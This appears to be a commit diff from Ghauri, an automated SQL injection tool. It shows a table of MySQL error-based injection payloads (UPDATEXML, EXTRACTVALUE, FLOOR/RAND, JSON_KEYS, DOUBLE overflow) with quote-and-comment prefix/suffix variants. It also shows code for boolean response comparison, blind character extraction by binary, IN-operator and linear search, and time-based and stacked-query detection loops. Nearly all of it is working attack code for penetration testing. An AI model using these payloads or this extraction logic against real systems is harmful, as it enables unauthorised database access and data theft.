    620  - {"pref": "') ", "suf": "-- wXyW"},
    621  - # {"pref": '") ', "suf": ""},
    622  - {"pref": '") ', "suf": "-- wXyW"},
    623  - ],
    624  - "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)",
    625  - "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
    626  - "dbms": "MySQL",
    627  - },
    628  - {
    629  - "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
    630  - "comments": [
    631  - # {"pref": " ", "suf": ""},
    632  - {"pref": " ", "suf": "-- wXyW"},
    633  - # {"pref": "' ", "suf": ""},
    634  - {"pref": "' ", "suf": "-- wXyW"},
    635  - # {"pref": '" ', "suf": ""},
    636  - {"pref": '" ', "suf": "-- wXyW"},
    637  - # {"pref": ") ", "suf": ""},
    638  - {"pref": ") ", "suf": "-- wXyW"},
    639  - # {"pref": "') ", "suf": ""},
    640  - {"pref": "') ", "suf": "-- wXyW"},
    641  - # {"pref": '") ', "suf": ""},
    642  - {"pref": '") ', "suf": "-- wXyW"},
    643  - ],
    644  - "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)",
    645  - "vector": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
    646  - "dbms": "MySQL",
    647  - },
    648  - {
    649  - "payload": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
    650  - "comments": [
    651  - # {"pref": " ", "suf": ""},
    652  - {"pref": " ", "suf": "-- wXyW"},
    653  - # {"pref": "' ", "suf": ""},
    654  - {"pref": "' ", "suf": "-- wXyW"},
    655  - # {"pref": '" ', "suf": ""},
    656  - {"pref": '" ', "suf": "-- wXyW"},
    657  - # {"pref": ") ", "suf": ""},
    658  - {"pref": ") ", "suf": "-- wXyW"},
    659  - # {"pref": "') ", "suf": ""},
    660  - {"pref": "') ", "suf": "-- wXyW"},
    661  - # {"pref": '") ', "suf": ""},
    662  - {"pref": '") ', "suf": "-- wXyW"},
    663  - ],
    664  - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)",
    665  - "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
    666  - "dbms": "MySQL",
    667  - },
    668  - {
    669  - "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
    670  - "comments": [
    671  - # {"pref": " ", "suf": ""},
    672  - {"pref": " ", "suf": "-- wXyW"},
    673  - # {"pref": "' ", "suf": ""},
    674  - {"pref": "' ", "suf": "-- wXyW"},
    675  - # {"pref": '" ', "suf": ""},
    676  - {"pref": '" ', "suf": "-- wXyW"},
    677  - # {"pref": ") ", "suf": ""},
    678  - {"pref": ") ", "suf": "-- wXyW"},
    679  - # {"pref": "') ", "suf": ""},
    680  - {"pref": "') ", "suf": "-- wXyW"},
    681  - # {"pref": '") ', "suf": ""},
    682  - {"pref": '") ', "suf": "-- wXyW"},
    683  - ],
    684  - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (DOUBLE)",
    685  - "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
    686  - "dbms": "MySQL",
    687  - },
    688  - {
    689  - "payload": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e),0)",
    690  - "comments": [
    691  - # {"pref": " ", "suf": ""},
    692  - {"pref": " ", "suf": "-- wXyW"},
    693  - # {"pref": "' ", "suf": ""},
    694  - {"pref": "' ", "suf": "-- wXyW"},
    695  - # {"pref": '" ', "suf": ""},
    696  - {"pref": '" ', "suf": "-- wXyW"},
    697  - # {"pref": ") ", "suf": ""},
    698  - {"pref": ") ", "suf": "-- wXyW"},
    699  - # {"pref": "') ", "suf": ""},
    700  - {"pref": "') ", "suf": "-- wXyW"},
    701  - # {"pref": '") ', "suf": ""},
    702  - {"pref": '") ', "suf": "-- wXyW"},
    703  - ],
    704  - "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
    705  - "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
     793 + "title": "MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
     794 + "vector": "AND UPDATEXML(0,CONCAT_WS('(', '~',[INFERENCE],'~'),0)",
    706 795   "dbms": "MySQL",
    707 796   },
    708 797   {
    skipped 1 lines
    710 799   "comments": [
    711 800   # {"pref": " ", "suf": ""},
    712 801   {"pref": " ", "suf": "-- wXyW"},
     802 + {"pref": " ", "suf": "#"},
    713 803   # {"pref": "' ", "suf": ""},
    714 804   {"pref": "' ", "suf": "-- wXyW"},
     805 + {"pref": "' ", "suf": "#"},
    715 806   # {"pref": '" ', "suf": ""},
    716 807   {"pref": '" ', "suf": "-- wXyW"},
     808 + {"pref": '" ', "suf": "#"},
    717 809   # {"pref": ") ", "suf": ""},
    718 810   {"pref": ") ", "suf": "-- wXyW"},
     811 + {"pref": ") ", "suf": "#"},
    719 812   # {"pref": "') ", "suf": ""},
    720 813   {"pref": "') ", "suf": "-- wXyW"},
     814 + {"pref": "') ", "suf": "#"},
    721 815   # {"pref": '") ', "suf": ""},
    722 816   {"pref": '") ', "suf": "-- wXyW"},
     817 + {"pref": '") ', "suf": "#"},
    723 818   ],
    724 819   "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)",
    725 820   "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
    skipped 4 lines
    730 825   "comments": [
    731 826   # {"pref": " ", "suf": ""},
    732 827   {"pref": " ", "suf": "-- wXyW"},
     828 + {"pref": " ", "suf": "#"},
    733 829   # {"pref": "' ", "suf": ""},
    734 830   {"pref": "' ", "suf": "-- wXyW"},
     831 + {"pref": "' ", "suf": "#"},
    735 832   # {"pref": '" ', "suf": ""},
    736 833   {"pref": '" ', "suf": "-- wXyW"},
     834 + {"pref": '" ', "suf": "#"},
    737 835   # {"pref": ") ", "suf": ""},
    738 836   {"pref": ") ", "suf": "-- wXyW"},
     837 + {"pref": ") ", "suf": "#"},
    739 838   # {"pref": "') ", "suf": ""},
    740 839   {"pref": "') ", "suf": "-- wXyW"},
     840 + {"pref": "') ", "suf": "#"},
    741 841   # {"pref": '") ', "suf": ""},
    742 842   {"pref": '") ', "suf": "-- wXyW"},
     843 + {"pref": '") ', "suf": "#"},
    743 844   ],
    744 845   "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
    745 846   "vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
    skipped 4 lines
    750 851   "comments": [
    751 852   # {"pref": " ", "suf": ""},
    752 853   {"pref": " ", "suf": "-- wXyW"},
     854 + {"pref": " ", "suf": "#"},
    753 855   # {"pref": "' ", "suf": ""},
    754 856   {"pref": "' ", "suf": "-- wXyW"},
     857 + {"pref": "' ", "suf": "#"},
    755 858   # {"pref": '" ', "suf": ""},
    756 859   {"pref": '" ', "suf": "-- wXyW"},
     860 + {"pref": '" ', "suf": "#"},
    757 861   # {"pref": ") ", "suf": ""},
    758 862   {"pref": ") ", "suf": "-- wXyW"},
     863 + {"pref": ") ", "suf": "#"},
    759 864   # {"pref": "') ", "suf": ""},
    760 865   {"pref": "') ", "suf": "-- wXyW"},
     866 + {"pref": "') ", "suf": "#"},
    761 867   # {"pref": '") ', "suf": ""},
    762 868   {"pref": '") ', "suf": "-- wXyW"},
     869 + {"pref": '") ', "suf": "#"},
    763 870   ],
    764 871   "title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)",
    765 872   "vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))",
    skipped 4 lines
    770 877   "comments": [
    771 878   # {"pref": " ", "suf": ""},
    772 879   {"pref": " ", "suf": "-- wXyW"},
     880 + {"pref": " ", "suf": "#"},
    773 881   # {"pref": "' ", "suf": ""},
    774 882   {"pref": "' ", "suf": "-- wXyW"},
     883 + {"pref": "' ", "suf": "#"},
    775 884   # {"pref": '" ', "suf": ""},
    776 885   {"pref": '" ', "suf": "-- wXyW"},
     886 + {"pref": '" ', "suf": "#"},
    777 887   # {"pref": ") ", "suf": ""},
    778 888   {"pref": ") ", "suf": "-- wXyW"},
     889 + {"pref": ") ", "suf": "#"},
    779 890   # {"pref": "') ", "suf": ""},
    780 891   {"pref": "') ", "suf": "-- wXyW"},
     892 + {"pref": "') ", "suf": "#"},
    781 893   # {"pref": '") ', "suf": ""},
    782 894   {"pref": '") ', "suf": "-- wXyW"},
     895 + {"pref": '") ', "suf": "#"},
    783 896   ],
    784 897   "title": "MySQL >= 5.1 error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (PROCEDURE ANALYSE)",
    785 898   "vector": "PROCEDURE ANALYSE(UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0),1)",
    skipped 4 lines
    790 903   "comments": [
    791 904   # {"pref": " ", "suf": ""},
    792 905   {"pref": " ", "suf": "-- wXyW"},
     906 + {"pref": " ", "suf": "#"},
    793 907   # {"pref": "' ", "suf": ""},
    794 908   {"pref": "' ", "suf": "-- wXyW"},
     909 + {"pref": "' ", "suf": "#"},
    795 910   # {"pref": '" ', "suf": ""},
    796 911   {"pref": '" ', "suf": "-- wXyW"},
     912 + {"pref": '" ', "suf": "#"},
    797 913   # {"pref": ") ", "suf": ""},
    798 914   {"pref": ") ", "suf": "-- wXyW"},
     915 + {"pref": ") ", "suf": "#"},
    799 916   # {"pref": "') ", "suf": ""},
    800 917   {"pref": "') ", "suf": "-- wXyW"},
     918 + {"pref": "') ", "suf": "#"},
    801 919   # {"pref": '") ', "suf": ""},
    802 920   {"pref": '") ', "suf": "-- wXyW"},
     921 + {"pref": '") ', "suf": "#"},
    803 922   ],
    804 923   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)",
    805 924   "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    skipped 4 lines
    810 929   "comments": [
    811 930   # {"pref": " ", "suf": ""},
    812 931   {"pref": " ", "suf": "-- wXyW"},
     932 + {"pref": " ", "suf": "#"},
    813 933   # {"pref": "' ", "suf": ""},
    814 934   {"pref": "' ", "suf": "-- wXyW"},
     935 + {"pref": "' ", "suf": "#"},
    815 936   # {"pref": '" ', "suf": ""},
    816 937   {"pref": '" ', "suf": "-- wXyW"},
     938 + {"pref": '" ', "suf": "#"},
    817 939   # {"pref": ") ", "suf": ""},
    818 940   {"pref": ") ", "suf": "-- wXyW"},
     941 + {"pref": ") ", "suf": "#"},
    819 942   # {"pref": "') ", "suf": ""},
    820 943   {"pref": "') ", "suf": "-- wXyW"},
     944 + {"pref": "') ", "suf": "#"},
    821 945   # {"pref": '") ', "suf": ""},
    822 946   {"pref": '") ', "suf": "-- wXyW"},
     947 + {"pref": '") ', "suf": "#"},
    823 948   ],
    824 949   "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)",
    825 950   "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    skipped 959 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/utils.py
    skipped 323 lines
    324 324  def get_boolean_ratio(w1, w2):
    325 325   ratio = 0
    326 326   try:
    327  - ratio = round(SequenceMatcher(None, w1, w2).ratio(), 2)
     327 + ratio = round(SequenceMatcher(None, w1, w2).quick_ratio(), 3)
    328 328   except:
    329 329   w1 = w1 + " " * (len(w2) - len(w1))
    330 330   w2 = w2 + " " * (len(w1) - len(w2))
    skipped 128 lines
    459 459   return _temp
    460 460   
    461 461   
     462 +def extract_page_content(response):
     463 + response = response or ""
     464 + regex = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
     465 + ok = [mobj.group("result").strip() for mobj in re.finditer(regex, response) if mobj]
     466 + ok = [i for i in ok if i and i != ""]
     467 + return ok
     468 + 
     469 + 
    462 470  def check_boolean_responses(
    463 471   base,
    464 472   attack_true,
    skipped 59 lines
    524 532   w2 = attack_false.filtered_text
    525 533   ratio_true = get_boolean_ratio(w0, w1)
    526 534   ratio_false = get_boolean_ratio(w0, w2)
     535 + logger.debug(f"ratio false payload attack: {ratio_false}")
     536 + logger.debug(f"ratio true payload attack: {ratio_true}")
     537 + if not conf.match_ratio:
     538 + if ratio_false >= 0.02 and ratio_false <= 0.98:
     539 + conf.match_ratio = ratio_false
     540 + logger.debug(
     541 + f"setting match ratio for current parameter to {conf.match_ratio}"
     542 + )
    527 543   if code:
    528 544   if code == sct or code == scf:
    529 545   is_vulner = True
    skipped 62 lines
    592 608   )
    593 609   is_vulner = False
    594 610   case = ""
    595  - if w0set == w1set != w2set:
    596  - candidates = w1set - w2set - w0set
    597  - if candidates:
    598  - candidates = sorted(candidates, key=len)
    599  - for candidate in candidates:
    600  - mobj = re.match(r"\A[\w.,! ]+\Z", candidate)
    601  - if (
    602  - mobj
    603  - and " " in candidate
    604  - and candidate.strip()
    605  - and len(candidate) > 10
    606  - ):
    607  - difference = candidate
    608  - string = difference
    609  - is_vulner = True
    610  - case = "Page Ratio"
    611  - break
    612  - if w0set == w2set != w1set:
    613  - candidates = w2set - w1set - w0set
    614  - if candidates:
    615  - candidates = sorted(candidates, key=len)
    616  - for candidate in candidates:
    617  - mobj = re.match(r"\A[\w.,! ]+\Z", candidate)
    618  - if (
    619  - mobj
    620  - and " " in candidate
    621  - and candidate.strip()
    622  - and len(candidate) > 10
    623  - ):
    624  - difference = candidate
    625  - string = difference
    626  - is_vulner = True
    627  - case = "Page Ratio"
    628  - break
    629 611   if not difference and not is_vulner:
    630 612   # special case when the above page ratio mechanism fails.
    631 613   ok = check_page_difference(w1, w2)
    skipped 4 lines
    636 618   string = ok.differences.get("string")
    637 619   not_string = ok.differences.get("not_string")
    638 620   logger.debug(f'injectable with --string="{difference}".')
     621 + if not difference and not is_vulner:
     622 + if w0set == w1set != w2set:
     623 + candidates = w1set - w2set - w0set
     624 + if candidates:
     625 + candidates = sorted(candidates, key=len)
     626 + for candidate in candidates:
     627 + mobj = re.match(r"\A[\w.,! ]+\Z", candidate)
     628 + if (
     629 + mobj
     630 + and " " in candidate
     631 + and candidate.strip()
     632 + and len(candidate) > 10
     633 + ):
     634 + difference = candidate
     635 + string = difference
     636 + is_vulner = True
     637 + case = "Page Ratio"
     638 + break
     639 + if ratio_true != ratio_false:
     640 + tset = set(extract_page_content(attack_true.text))
     641 + tset |= set(__ for _ in tset for __ in _.split())
     642 + fset = eset = set(extract_page_content(attack_false.text))
     643 + fset |= set(__ for _ in fset for __ in _.split())
     644 + eset |= set(__ for _ in eset for __ in _.split())
     645 + ok = tset - fset - eset
     646 + candidates = [
     647 + _.strip()
     648 + if _.strip() in attack_true.text
     649 + and _.strip() not in attack_false.text
     650 + else None
     651 + for _ in ok
     652 + ]
     653 + candidates = [i for i in candidates if i]
     654 + if candidates:
     655 + candidates = sorted(candidates, key=len)
     656 + for candidate in candidates:
     657 + ok = re.match(r"\A\w{2,}\Z", candidate)
     658 + if ok:
     659 + difference = candidate
     660 + string = conf.string = candidate
     661 + is_vulner = True
     662 + break
     663 + if difference and is_vulner:
     664 + string = difference
     665 + not_string = ""
     666 + case = "Page Ratio"
     667 + logger.debug(f'injectable with --string="{difference}".')
    639 668   if is_vulner:
    640 669   logger.debug(f"injectable with cases: '{case}'.")
    641 670   _temp = BooleanInjectionResponse(
    skipped 106 lines
    748 777   value, backend=None, is_string=False, payload=None, to_str=False, to_char=False
    749 778  ):
    750 779   if backend == "MySQL":
    751  - return f"0x{binascii.hexlify(value.encode()).decode()}"
     780 + if to_str:
     781 + return value
     782 + else:
     783 + return f"0x{binascii.hexlify(value.encode()).decode()}"
    752 784   if backend == "PostgreSQL":
    753 785   return f"({'||'.join([f'CHR({ord(i)})' for i in value.strip()])})"
    754 786   if backend == "Microsoft SQL Server":
    skipped 951 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/core/extract.py
    skipped 319 lines
    320 320   expression_payload=None,
    321 321   text_only=False,
    322 322   retry=3,
     323 + code=None,
    323 324   ):
    324 325   # we will validate character indendified in case of boolean based blind sqli only for now..
    325 326   is_valid = False
    skipped 72 lines
    398 399   attack,
    399 400   attack01,
    400 401   match_string=match_string,
     402 + not_match_string=not_match_string,
     403 + code=code,
     404 + text_only=text_only,
    401 405   )
    402 406   result = bool_retval.vulnerable
    403 407   if result:
    skipped 1266 lines
    1670 1674   offset=pos,
    1671 1675   expression_payload=value,
    1672 1676   queryable=entry,
     1677 + code=code,
     1678 + match_string=match_string,
     1679 + not_match_string=not_match_string,
     1680 + attack01=attack01,
    1673 1681   )
    1674 1682   if not is_valid:
    1675 1683   logger.warning(
    skipped 53 lines
    1729 1737   offset=pos,
    1730 1738   expression_payload=value,
    1731 1739   queryable=entry,
     1740 + code=code,
     1741 + match_string=match_string,
     1742 + not_match_string=not_match_string,
     1743 + attack01=attack01,
    1732 1744   )
    1733 1745   if not is_valid:
    1734 1746   logger.warning(
    skipped 51 lines
    1786 1798   offset=pos,
    1787 1799   expression_payload=value,
    1788 1800   queryable=entry,
     1801 + code=code,
     1802 + match_string=match_string,
     1803 + not_match_string=not_match_string,
     1804 + attack01=attack01,
    1789 1805   )
    1790 1806   if not is_valid:
    1791 1807   logger.warning(
    1792 1808   "invalid character detected, retrying."
    1793 1809   )
    1794 1810   bool_invalid_character_counter += 1
    1795  - binary_search = True
    1796  - in_based_search = True
    1797  - linear_search = False
     1811 + binary_search = (
     1812 + retval_check.binary_search
     1813 + )
     1814 + in_based_search = (
     1815 + retval_check.in_based_search
     1816 + )
     1817 + linear_search = (
     1818 + retval_check.linear_search
     1819 + )
    1798 1820   if is_valid:
    1799 1821   pos += 1
    1800 1822   chars += retval
    skipped 30 lines
    1831 1853   break
    1832 1854   if vector_type == "time_vector":
    1833 1855   try:
    1834  - if invalid_character_detection_counter >= 1:
    1835  - change_algo_on_invalid_character = True
    1836  - if not is_change_algo_notified:
    1837  - logger.warning(
    1838  - "ghauri was not able to guess character, switching algorithm.."
     1856 + if binary_search:
     1857 + retval = self._binary_search(
     1858 + url=url,
     1859 + data=data,
     1860 + vector=vector,
     1861 + parameter=parameter,
     1862 + headers=headers,
     1863 + base=base,
     1864 + injection_type=injection_type,
     1865 + delay=delay,
     1866 + timesec=timesec,
     1867 + timeout=timeout,
     1868 + proxy=proxy,
     1869 + is_multipart=is_multipart,
     1870 + suppress_output=suppress_output,
     1871 + query_check=query_check,
     1872 + minimum=32,
     1873 + maximum=127,
     1874 + offset=pos,
     1875 + expression_payload=value,
     1876 + queryable=entry,
     1877 + chars=chars,
     1878 + vector_type=vector_type,
     1879 + )
     1880 + if retval:
     1881 + is_valid = self.validate_character(
     1882 + url=url,
     1883 + data=data,
     1884 + vector=vector,
     1885 + parameter=parameter,
     1886 + headers=headers,
     1887 + base=base,
     1888 + injection_type=injection_type,
     1889 + proxy=proxy,
     1890 + is_multipart=is_multipart,
     1891 + timeout=timeout,
     1892 + delay=delay,
     1893 + timesec=timesec,
     1894 + identified_character=retval,
     1895 + vector_type=vector_type,
     1896 + offset=pos,
     1897 + expression_payload=value,
     1898 + queryable=entry,
    1839 1899   )
    1840  - is_change_algo_notified = True
    1841  - if not change_algo_on_invalid_character:
     1900 + if not is_valid:
     1901 + logger.warning(
     1902 + "invalid character detected, retrying."
     1903 + )
     1904 + invalid_character_detection_counter += 1
     1905 + binary_search = False
     1906 + in_based_search = True
     1907 + linear_search = False
     1908 + if is_valid:
     1909 + pos += 1
     1910 + chars += retval
     1911 + elif in_based_search:
    1842 1912   retval = self._search_using_in_operator(
    1843 1913   url=url,
    1844 1914   data=data,
    skipped 42 lines
    1887 1957   "invalid character detected, retrying.."
    1888 1958   )
    1889 1959   invalid_character_detection_counter += 1
     1960 + binary_search = False
     1961 + in_based_search = False
     1962 + linear_search = True
    1890 1963   if is_valid:
    1891 1964   pos += 1
    1892 1965   chars += retval
    skipped 18 lines
    1911 1984   list_of_chars=list_of_chars,
    1912 1985   vector_type=vector_type,
    1913 1986   )
     1987 + if retval:
     1988 + is_valid = self.validate_character(
     1989 + url=url,
     1990 + data=data,
     1991 + vector=vector,
     1992 + parameter=parameter,
     1993 + headers=headers,
     1994 + base=base,
     1995 + injection_type=injection_type,
     1996 + proxy=proxy,
     1997 + is_multipart=is_multipart,
     1998 + timeout=timeout,
     1999 + delay=delay,
     2000 + timesec=timesec,
     2001 + identified_character=retval,
     2002 + vector_type=vector_type,
     2003 + offset=pos,
     2004 + expression_payload=value,
     2005 + queryable=entry,
     2006 + )
     2007 + if not is_valid:
     2008 + logger.warning(
     2009 + "invalid character detected, retrying.."
     2010 + )
     2011 + invalid_character_detection_counter += 1
     2012 + binary_search = (
     2013 + retval_check.binary_search
     2014 + )
     2015 + in_based_search = (
     2016 + retval_check.in_based_search
     2017 + )
     2018 + linear_search = (
     2019 + retval_check.linear_search
     2020 + )
     2021 + if is_valid:
     2022 + pos += 1
     2023 + chars += retval
    1914 2024   chars += retval
    1915 2025   pos += 1
    1916 2026   try:
    1917  - if dump_type:
     2027 + if invalid_character_detection_counter >= 3:
     2028 + logger.debug(
     2029 + "time based technique(s) is not usable to data extraction switching to other if any.."
     2030 + )
     2031 + break
     2032 + if dump_type and chars:
    1918 2033   session.dump(
    1919 2034   session_filepath=conf.session_filepath,
    1920 2035   query=STORAGE_UPDATE,
    skipped 50 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/core/tests.py
    skipped 917 lines
    918 918   "is_different_status_code_injectable",
    919 919   ],
    920 920   )
     921 + stack_queries_payloads = fetch_db_specific_payload(
     922 + dbms=dbms,
     923 + booleanbased_only=False,
     924 + timebased_only=False,
     925 + stack_queries_only=bool("S" in techniques),
     926 + )
    921 927   time_based_payloads = fetch_db_specific_payload(
    922 928   dbms=dbms,
    923 929   booleanbased_only=False,
    924 930   timebased_only=bool("T" in techniques),
    925  - stack_queries_only=bool("S" in techniques),
     931 + stack_queries_only=False,
    926 932   )
     933 + payloads_response_delay = [stack_queries_payloads, time_based_payloads]
    927 934   param_key = parameter.get("key")
    928 935   param_value = parameter.get("value")
    929 936   sleep_time = random.randint(5, 9)
    skipped 6 lines
    936 943   terminate_on_web_firewall = False
    937 944   http_firewall_code_counter = 0
    938 945   error_msg = None
    939  - for entry in time_based_payloads:
    940  - backend = entry.dbms
    941  - index_of_payload = 0
    942  - retry_on_error = 0
    943  - if terminate_on_web_firewall:
    944  - break
    945  - if terminate_on_errors:
    946  - break
    947  - payloads = fetch_payloads_by_suffix_prefix(
    948  - payloads=entry.payloads, prefix=prefix, suffix=suffix
    949  - )
    950  - total_payloads = len(payloads)
    951  - logger.info(f"testing '{entry.title}'")
    952  - while index_of_payload < total_payloads:
    953  - if http_firewall_code_counter > 2:
    954  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    955  - logger.warning(f"HTTP error code detected during run:")
    956  - choice = logger.read_input(
    957  - f"{message}. Do you want to keep testing the others (if any) [y/N]? ",
    958  - batch=False,
    959  - user_input="N",
    960  - )
    961  - if choice == "n":
    962  - terminate_on_web_firewall = True
    963  - break
    964  - if choice == "y":
    965  - http_firewall_code_counter = 0
    966  - if retry_on_error >= retry:
    967  - logger.warning(f"Ghauri detected connection errors multiple times")
    968  - choice = logger.read_input(
    969  - f"Do you want to keep testing the others (if any) [y/N]? ",
    970  - batch=False,
    971  - user_input="N",
    972  - )
    973  - if choice == "n":
    974  - terminate_on_errors = True
    975  - break
    976  - if choice == "y":
    977  - retry_on_error = 0
    978  - if delay > 0:
    979  - time.sleep(delay)
    980  - _payload = payloads[index_of_payload]
    981  - string = _payload.string
    982  - expression = string.replace("[SLEEPTIME]", "%s" % (sleep_time))
    983  - decoded_expression = urldecode(expression)
    984  - logger.payload(f"{decoded_expression}")
    985  - try:
    986  - attack = inject_expression(
    987  - url=url,
    988  - data=data,
    989  - proxy=proxy,
    990  - delay=delay,
    991  - timesec=timesec,
    992  - timeout=timeout,
    993  - headers=headers,
    994  - parameter=parameter,
    995  - expression=expression,
    996  - is_multipart=is_multipart,
    997  - injection_type=injection_type,
    998  - )
    999  - index_of_payload += 1
    1000  - retry_on_error = 0
    1001  - except KeyboardInterrupt:
    1002  - logger.warning("user aborted during detection phase")
    1003  - quest = logger.read_input(
    1004  - "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] ",
    1005  - batch=False,
    1006  - user_input="S",
    1007  - )
    1008  - if quest and quest == "n":
    1009  - # later on will handle this nicely..
    1010  - return "next parameter"
    1011  - if quest and quest == "q":
    1012  - logger.error("user quit")
    1013  - logger.end("ending")
    1014  - exit(0)
    1015  - if quest and quest == "e":
    1016  - end_detection_phase = True
    1017  - if quest and quest == "s":
    1018  - break
    1019  - except ConnectionAbortedError as e:
    1020  - logger.critical(
    1021  - f"connection attempt to the target URL was aborted by the peer, Ghauri is going to retry"
    1022  - )
    1023  - retry_on_error += 1
    1024  - except ConnectionRefusedError as e:
    1025  - logger.critical(
    1026  - f"connection attempt to the target URL was refused by the peer. Ghauri is going to retry"
    1027  - )
    1028  - retry_on_error += 1
    1029  - except ConnectionResetError as e:
    1030  - logger.critical(
    1031  - f"connection attempt to the target URL was reset by the peer. Ghauri is going to retry"
    1032  - )
    1033  - retry_on_error += 1
    1034  - except Exception as error:
    1035  - logger.critical(
    1036  - f"error {error}, during detection phase. Ghauri is going to retry"
    1037  - )
    1038  - retry_on_error += 1
    1039  - response_time = attack.response_time
    1040  - if response_time < sleep_time and end_detection_phase:
    1041  - return None
    1042  - requests_counter += 1
    1043  - with_status_code_msg = ""
    1044  - with_status_code = attack.status_code
    1045  - if attack.status_code != base.status_code:
    1046  - is_different_status_code_injectable = True
    1047  - if with_status_code == 4001:
    1048  - with_status_code_msg = (
    1049  - f" (with error ReadTimeout on --timeout={timeout})"
     946 + for payloads_delay in payloads_response_delay:
     947 + for entry in payloads_delay:
     948 + backend = entry.dbms
     949 + index_of_payload = 0
     950 + retry_on_error = 0
     951 + if terminate_on_web_firewall:
     952 + break
     953 + if terminate_on_errors:
     954 + break
     955 + payloads = fetch_payloads_by_suffix_prefix(
     956 + payloads=entry.payloads, prefix=prefix, suffix=suffix
     957 + )
     958 + total_payloads = len(payloads)
     959 + logger.info(f"testing '{entry.title}'")
     960 + while index_of_payload < total_payloads:
     961 + if http_firewall_code_counter > 2:
     962 + message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     963 + logger.warning(f"HTTP error code detected during run:")
     964 + choice = logger.read_input(
     965 + f"{message}. Do you want to keep testing the others (if any) [y/N]? ",
     966 + batch=False,
     967 + user_input="N",
    1050 968   )
    1051  - else:
    1052  - with_status_code_msg = f" (with --code={with_status_code})"
    1053  - if attack.status_code in [403, 406] and code and code not in [403, 406]:
    1054  - logger.critical(
    1055  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    1056  - )
    1057  - time.sleep(0.5)
    1058  - error_msg = attack.error_msg
    1059  - http_firewall_code_counter += 1
    1060  - continue
    1061  - logger.debug(f"sleep time: {sleep_time}, response time: {response_time}")
    1062  - if response_time >= sleep_time:
    1063  - is_injected = True
    1064  - _it = injection_type
    1065  - if param_key == "#1*":
    1066  - _it = "URI"
    1067  - if is_multipart:
    1068  - message = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
    1069  - elif is_json:
    1070  - message = f"(custom) {injection_type} parameter '{mc}JSON {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
    1071  - else:
    1072  - message = f"{_it} parameter '{mc}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
    1073  - if with_status_code_msg and "ReadTimeout" in with_status_code_msg:
    1074  - logger.warning(
    1075  - "in case of read timeout performing further tests to confirm if the detected payload is working.."
     969 + if choice == "n":
     970 + terminate_on_web_firewall = True
     971 + break
     972 + if choice == "y":
     973 + http_firewall_code_counter = 0
     974 + if retry_on_error >= retry:
     975 + logger.warning(f"Ghauri detected connection errors multiple times")
     976 + choice = logger.read_input(
     977 + f"Do you want to keep testing the others (if any) [y/N]? ",
     978 + batch=False,
     979 + user_input="N",
    1076 980   )
    1077  - ok = confirm_timebased_sqli(
    1078  - base,
    1079  - parameter,
    1080  - _payload,
    1081  - sleep_time,
    1082  - response_time,
     981 + if choice == "n":
     982 + terminate_on_errors = True
     983 + break
     984 + if choice == "y":
     985 + retry_on_error = 0
     986 + if delay > 0:
     987 + time.sleep(delay)
